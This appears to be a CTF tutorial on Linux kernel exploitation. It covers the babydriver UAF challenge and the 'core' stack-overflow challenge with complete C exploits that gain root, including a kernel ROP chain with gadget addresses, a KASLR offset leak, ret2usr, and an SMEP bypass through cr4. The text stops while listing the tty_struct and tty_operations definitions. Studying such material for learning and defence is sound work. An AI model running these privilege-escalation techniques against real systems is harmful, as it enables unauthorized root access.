BASIC

environment

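Before learning kernel pwn, you need to set up several prerequisites:

qemu
busybox
A compiled Linux kernel (optional)

For the exact installation steps and any errors you run into, please search online (mainly because I got tortured by them too, haha).

File system

Kernel challenges almost always ship a packed file system, so you need to know the common pack and unpack commands: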

find . | cpio -o --format=newc > ./rootfs.cpio
cpio -idmv < ./rootfs.cpio

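The cred struct

The kernel uses the cred struct to record a process's privileges. If you can hijack or forge a cred struct, you can change the privileges of the current process.

Its definition is as follows: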

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
} __randomize_layout;

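In general, we need to find a way to set uid and gid to 0 (root's uid and gid are both 0).

If you can hijack control flow, calling the following functions achieves the same effect:

commit_creds(prepare_kernel_cred(0));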

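Kernel-mode functions

Functions that run in kernel mode differ slightly from their user-mode counterparts:

printf -> printk

memcpy -> copy_to_user / copy_from_user

The kernel does not use libc; its heap allocator is SLAB or SLUB. The corresponding functions are:

malloc -> kmalloc

free -> kfree

For security reasons, when SMEP is enabled the kernel can only execute kernel-space code, so to run a function such as system you must manually switch back to user mode.

The instructions commonly used for this are swapgs and iretq.

Some saved user-mode context (rip, cs, rflags, rsp, ss) also has to be placed on the stack for iretq to restore.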

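Debugging with GDB

Taking the babydriver challenge as an example, first use the extract-vmlinux script to extract the uncompressed kernel image from bzImage:

./extract-vmlinux ./bzImage > ./linux

(Script source: https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux)

Inside qemu, find the start address of the code segment of babydriver.ko (for example, as root, by reading /sys/module/babydriver/sections/.text).

After starting gdb, load the module's symbols at that address:

add-symbol-file ./lib/modules/4.4.72/babydriver.ko 0xffffffffc0000000

Then add the gdb stub option (-gdb tcp::1234) to the qemu command line in boot.sh.

After restarting qemu, connect to it remotely from gdb:

pwndbg> target remote 127.0.0.1:1234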

ATTACK

Kernel UAF

babydriver

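Analysis

This is a classic introductory kernel pwn challenge from CISCN 2017.

After unpacking rootfs.cpio, the LKM file babydriver.ko can be found in /lib/modules/4.4.72.

A protection check shows that only NX is enabled and the symbol table has not been stripped, which makes debugging and analysis easy.

Load it straight into IDA.

In babyrelease, babydev_struct.device_buf is not cleared after kfree(), which leads to a UAF vulnerability.

Moreover, babydev_struct is a global variable of type babydevice_t with two fields: device_buf, which appears to hold a pointer to a buffer, and device_buf_len, which holds the size of that buffer.

The other functions are unremarkable:

babyopen simply initializes babydev_struct when the device is opened.

babywrite and babyread only check whether the buf pointer is NULL.

babyioctl is more interesting: when its second argument, command, is 0x10001, it lets us set babydev_struct.device_buf_len to a value we specify.

With that, the exploitation idea is clear.

Because only one babydev_struct exists and babyrelease contains the UAF, we can open the device twice, use babyioctl to change babydev_struct.device_buf_len to the size of a cred struct, and then close the first descriptor to free the buffer, leaving the second descriptor with a dangling pointer.

Next, fork() a new process. Because the kernel allocator is SLAB or SLUB, the freed chunk, which has the same size as a cred struct, is handed straight back as the new process's cred.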

In that process, calling babywrite lets us set the cred's uid and gid to 0.

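Once the exp is written, it must be statically linked, because rootfs.cpio contains no libc:

gcc exp.c -o exp -static

Then repack the file system and point the -initrd argument in boot.sh at the newly packed file system.

Start qemu again and run the exp to escalate privileges.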

exp

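#include<unistd.h>
#include<stdio.h>
#include<stdlib.h>
#include<fcntl.h>
#include<sys/ioctl.h>
#include<sys/wait.h>
#include<sys/stat.h>
int main(){
	// Both descriptors share the single global babydev_struct.
	int fd1 = open("/dev/babydev", O_RDWR);
	int fd2 = open("/dev/babydev", O_RDWR);

	// Set the buffer size to 0xa8, the cred size used for this kernel.
	ioctl(fd1, 0x10001, 0xa8);

	// Free the buffer; fd2 still refers to it (dangling pointer).
	close(fd1);
	// The child's cred is expected to reuse the freed chunk.
	int id = fork();
	if(id<0){
		printf("fork error!\n");
		exit(-1);
	}
	else if(id==0){
		// Zero the first 0x1c bytes of the child's cred through fd2.
		char cred[0x20] = {0};
		write(fd2, cred, 0x1c);
		if(getuid()==0){
			system("/bin/sh");
			exit(0);
		}
	}
	else{
		wait(NULL);
	}
	return 0;
}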

Kernel ROP

core

Analysis

The challenge provides four files: bzImage, core.cpio, start.sh, and vmlinux.

First unpack core.cpio.

Besides the usual files, there is an extra gen_cpio.sh.

Its contents are:

find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > $1

This is a helper script for quickly repacking the file system.

Now look at start.sh:

qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd  ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic  \

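KASLR is enabled, and -s already opens a gdb port, so there is no need to add -gdb tcp::1234.

However, the 64M of memory it configures was not enough; I had to raise it to 256M before the VM would boot.

Next, analyze init: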

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0  -f

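The notable part is that /proc/sys/kernel/kptr_restrict and /proc/sys/kernel/dmesg_restrict are both set to 1, so function addresses can no longer be obtained from dmesg or by reading /proc/kallsyms.

Fortunately, there is an earlier line

cat /proc/kallsyms > /tmp/kallsyms

that backs up kallsyms into /tmp.

After that, the script runs poweroff -d 120 -f, which gets in the way of debugging; you can delete the line or increase the timeout.

In my final modified init file, I also back up the address of core's .text section, which makes it easier for gdb to load the symbol file later.

Besides, /sys/module/core/sections/.text is readable only by root, so backing it up is the least hassle; alternatively, you can simply change the script to start the shell as root.

In addition, to make repacking and debugging easier, I wrote two small helper scripts: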

root@ubuntu:/home/kotori/Desktop/core# cat pack.sh
rm ./core.cpio
./gen_cpio.sh ./core.cpio
chmod 777 ./core.cpio
root@ubuntu:/home/kotori/Desktop/core# cat mkc.sh
gcc ./exp.c -o exp --static -masm=intel
chmod 777 ./exp
sudo ./pack.sh

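Next comes analyzing the vulnerability in core.ko.

Canary and NX are enabled.

init_module() and exit_core() register and remove /proc/core respectively, and core_release() does nothing, so they are not analyzed here.

core_ioctl defines three operations: calling core_read(), setting the global variable off, and calling core_copy_func().

core_read copies 0x40 bytes, starting at offset off from rsp, into the specified buffer.

With a suitable off, this can read out the canary.

core_write copies at most 0x800 bytes from the specified buffer into name.

core_copy_func is the biggest vulnerability in the whole LKM. When the length argument a1 is less than or equal to 63, it copies that many bytes from name into the stack variable v2. However, a1 is compared with 63 as a signed number, while the final qmemcpy call converts it to unsigned __int16. So we only need to set the low two bytes of a1 to any length large enough to cover the payload stored in name, and set all the remaining bytes to 0xff. The a1 I ended up constructing is 0xffffffffffff0100.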

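So the whole attack goes as follows:

Set off appropriately and read out the canary.
Build the ROP chain, then call core_write to write it into name.
Call core_copy_func to copy the contents of name into the stack variable v2, overflowing the stack and calling commit_creds(prepare_kernel_cred(0)) to escalate privileges.

Of course, before writing the ROP chain there is one more small problem to solve: the address offset introduced by KASLR and PIE.

The base address of the original non-PIE vmlinux is 0xffffffff81000000.

The address of commit_creds is 0xffffffff81000000+0x9c8e0.

The address of prepare_kernel_cred is 0xffffffff81000000+0x9cce0.

These, along with the gadget addresses found later, are all addresses for the non-PIE case; we still need to know how far the actual runtime addresses are shifted from them.

This can be computed directly from /tmp/kallsyms, using the runtime address it gives for commit_creds or prepare_kernel_cred.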

size_t leak_vmlinux_base(){
	FILE* fd = fopen("/tmp/kallsyms", "r");
	if(fd==NULL){
		puts("[-] open file failed.");
		exit(-1);
	}
	char buf[0x40] = {0};
	while(fgets(buf, 0x30, fd)!=NULL){
		if(strstr(buf, "commit_creds")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &commit_creds);
			printf("[+] commit_creds: 0x%lx\n", commit_creds);
			prepare_kernel_cred = commit_creds-0x9c8e0+0x9cce0;
			fclose(fd);
			return commit_creds-0x9c8e0;
		}
		else if(strstr(buf, "prepare_kernel_cred")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &prepare_kernel_cred);
			printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
			commit_creds = prepare_kernel_cred-0x9cce0+0x9c8e0;
			fclose(fd);
			return prepare_kernel_cred-0x9cce0;
		}
	}
	fclose(fd);
	return 0;
}

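Gadgets can be dumped in advance with ropper (ROPgadget is too slow):

ropper --file ./vmlinux --nocolor > g

The ROP chain itself is simple: first set rdi to 0, then call prepare_kernel_cred, whose return value ends up in rax. A mov rdi, rax; ret gadget would finish the job, but unfortunately there is none.

Fortunately there are several similar ones; I chose mov rdi, rax; jmp rcx;

If rcx is loaded with commit_creds beforehand, this works nicely.

Then switch back to user mode. iretq; ret exists, but the only swapgs gadget is swapgs; popfq; ret;, so it must be followed by one junk value to balance the stack.

Finally, lay out the previously saved user-mode registers in the order rip, cs, rflags, rsp, ss.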

exp

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<unistd.h>
#include<fcntl.h>
#include<sys/stat.h>
#include<sys/types.h>
#include<sys/ioctl.h>
size_t u_cs, u_rflags, u_rsp, u_ss;
size_t commit_creds, prepare_kernel_cred;
void save_status(){
	__asm__("mov u_cs, cs;"
		"pushf;"
		"pop u_rflags;"
		"mov u_rsp, rsp;"
		"mov u_ss, ss;"
	);
}
void set_off(int fd, int offset){
	ioctl(fd, 0x6677889c, offset);
}
size_t leak_canary(int fd){
	size_t temp[0x10] = {0};
	set_off(fd, 0x40);
	ioctl(fd, 0x6677889b, temp);
	return temp[0];
}
size_t leak_vmlinux_base(){
	FILE* fd = fopen("/tmp/kallsyms", "r");
	if(fd==NULL){
		puts("[-] open file failed.");
		exit(-1);
	}
	char buf[0x40] = {0};
	while(fgets(buf, 0x30, fd)!=NULL){
		if(strstr(buf, "commit_creds")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &commit_creds);
			printf("[+] commit_creds: 0x%lx\n", commit_creds);
			prepare_kernel_cred = commit_creds-0x9c8e0+0x9cce0;
			fclose(fd);
			return commit_creds-0x9c8e0;
		}
		else if(strstr(buf, "prepare_kernel_cred")){
			char ptr[0x18] = {0};
			strncpy(ptr, buf, 0x10);
			sscanf(ptr, "%lx", &prepare_kernel_cred);
			printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
			commit_creds = prepare_kernel_cred-0x9cce0+0x9c8e0;
			fclose(fd);
			return prepare_kernel_cred-0x9cce0;
		}
	}
	fclose(fd);
	return 0;
}
void get_root_shell(){
		if(getuid()==0)
			system("/bin/sh");
		else{
			puts("[-] get root shell failed.");
			exit(-1);
		}
}
void rop(int fd, size_t canary, size_t offset){
	size_t name[0x100] = {0};
	//----gadgets----
	size_t pop_rdi = 0xffffffff81000b2f; // pop rdi; ret;
	size_t mov_rdi_rax_jmp_rcx = 0xffffffff811ae978; // mov rdi, rax; jmp rcx;
	size_t pop_rcx = 0xffffffff81021e53; // pop rcx; ret;
	size_t swapgs_popfq =  0xffffffff81a012da; // swapgs; popfq; ret;
	size_t iretq  =  0xffffffff81050ac2; // iretq; ret;
	int idx = 0;
	for(idx=0;idx<10;idx++)
		name[idx] = canary;
	name[idx++] = pop_rdi + offset;
	name[idx++] = 0;
	name[idx++] = prepare_kernel_cred;
	name[idx++] = pop_rcx + offset;
	name[idx++] = commit_creds;
	name[idx++] = mov_rdi_rax_jmp_rcx + offset;
	name[idx++] = swapgs_popfq + offset;
	name[idx++] = 0;
	name[idx++] = iretq + offset;
	name[idx++] = (size_t)get_root_shell; //rip
	name[idx++] = u_cs;
	name[idx++] = u_rflags;
	name[idx++] = u_rsp;
	name[idx++] = u_ss;
	write(fd, name, 0x800);
	puts("[+] rop loaded.");
	ioctl(fd, 0x6677889a, (0xffffffffffff0100));
}
int main(){
	save_status();
	int fd = open("/proc/core", O_RDWR);
	size_t canary = leak_canary(fd);
	printf("[+] canary: 0x%lx\n", canary);
	size_t vmlinux_base = leak_vmlinux_base();
	if(!vmlinux_base){
		printf("[-] leak base failed.\n");
		exit(-1);
	}
	size_t vmlinux_base_no_pie = 0xffffffff81000000;
	size_t offset = vmlinux_base - vmlinux_base_no_pie;
	printf("[+] offset: 0x%lx\n", offset);
	rop(fd, canary, offset);
	return 0;
}

ret2usr & SMEP

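core revisited

We previously solved core with kernel ROP. In fact, by default (without SMEP), although code running in user mode cannot execute kernel functions, code running in kernel mode can execute functions located in user space. We can therefore build commit_creds(prepare_kernel_cred(0)) in user space and then run it from kernel context with ring 0 privileges.

Using this, the core exp can be adjusted locally:

Add a get_root function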

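void get_root(){
	// commit_creds and prepare_kernel_cred hold leaked kernel addresses (size_t),
	// so cast them to function pointers explicitly.
	void* (*cc)(char *) = (void* (*)(char *))commit_creds;
	char* (*pkc)(int) = (char* (*)(int))prepare_kernel_cred;
	(*cc)((*pkc)(0)); // commit_creds(prepare_kernel_cred(0));
}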

Modify rop

for(idx=0;idx<10;idx++)
	name[idx] = canary;
/*
name[idx++] = pop_rdi + offset;
name[idx++] = 0;
name[idx++] = prepare_kernel_cred;
name[idx++] = pop_rcx + offset;
name[idx++] = commit_creds;
name[idx++] = mov_rdi_rax_jmp_rcx + offset;
*/
name[idx++] = (size_t)get_root;
name[idx++] = swapgs_popfq + offset;
name[idx++] = 0;
name[idx++] = iretq + offset;
name[idx++] = (size_t)get_root_shell; //rip
name[idx++] = u_cs;
name[idx++] = u_rflags;
name[idx++] = u_rsp;
name[idx++] = u_ss;

Privilege escalation still succeeds.

SMEP

Introduction

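SMEP prevents code running in kernel mode from executing code in user space, so a plain ret2usr fails.

However, whether SMEP is enabled is recorded in the cr4 register.

SMEP is enabled when bit 20 of cr4 is 1 and disabled when it is 0.

Bypass

Now that we know how SMEP is switched on and off, the bypass is straightforward: use some gadgets to modify the value of cr4. (It is usually set to 0x6f0, which disables both SMEP and SMAP.)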

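Re-solve: babydriver

Here we solve babydriver once more, this time with ret2usr.

Looking at boot.sh shows that SMEP is enabled.

So we need ROP to turn SMEP off first, and then escalate privileges with ret2usr.

But the bug in this challenge is a UAF, so how do we get to ROP? This is where the tty_struct and tty_operations structs come in.

Their definitions are as follows: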

struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;
    /* Protects ldisc changes: Lock tty not pty */
    struct ld_semaphore ldisc_sem;
    struct tty_ldisc *ldisc;
    struct mutex atomic_write_lock;
    struct mutex legacy_mutex;
    struct mutex throttle_mutex;
    struct rw_semaphore termios_rwsem;
    struct mutex winsize_mutex;
    spinlock_t ctrl_lock;
    spinlock_t flow_lock;
    /* Termios values are protected by the termios rwsem */
    struct ktermios termios, termios_locked;
    struct termiox *termiox;    /* May be NULL for unsupported */
    char name[64];
    struct pid *pgrp;       /* Protected by ctrl lock */
    struct pid *session;
    unsigned long flags;
    int count;
    struct winsize winsize;     /* winsize_mutex */
    unsigned long stopped:1,    /* flow_lock */
              flow_stopped:1,
              unused:BITS_PER_LONG - 2;
    int hw_stopped;
    unsigned long ctrl_status:8,    /* ctrl_lock */
              packet:1,
              unused_ctrl:BITS_PER_LONG - 9;
    unsigned int receive_room;  /* Bytes free for queue */
    int flow_change;
    struct tty_struct *link;
    struct fasync_struct *fasync;
    wait_queue_head_t write_wait;
    wait_queue_head_t read_wait;
    struct work_struct hangup_work;
    void *disc_data;
    void *driver_data;
    spinlock_t files_lock;      /* protects tty_files list */
    struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
    int closing;
    unsigned char *write_buf;
    int write_cnt;
    /* If the tty has a pending do_SAK, queue it here - akpm */
    struct work_struct SAK_work;
    struct tty_port *port;
} __randomize_layout;

struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
            struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct * tty,
              const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty,
            unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty,
                 unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
    void (*throttle)(struct tty_struct * tty);
    void (*unthrottle)(struct tty_struct * tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty,
            unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty,
                struct serial_icounter_struct *icount);
    void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
    int (*poll_init)(struct tty_driver *driver, int line, char *options);
    int (*poll_get_char)(struct tty_driver *driver, int line);
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
    int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;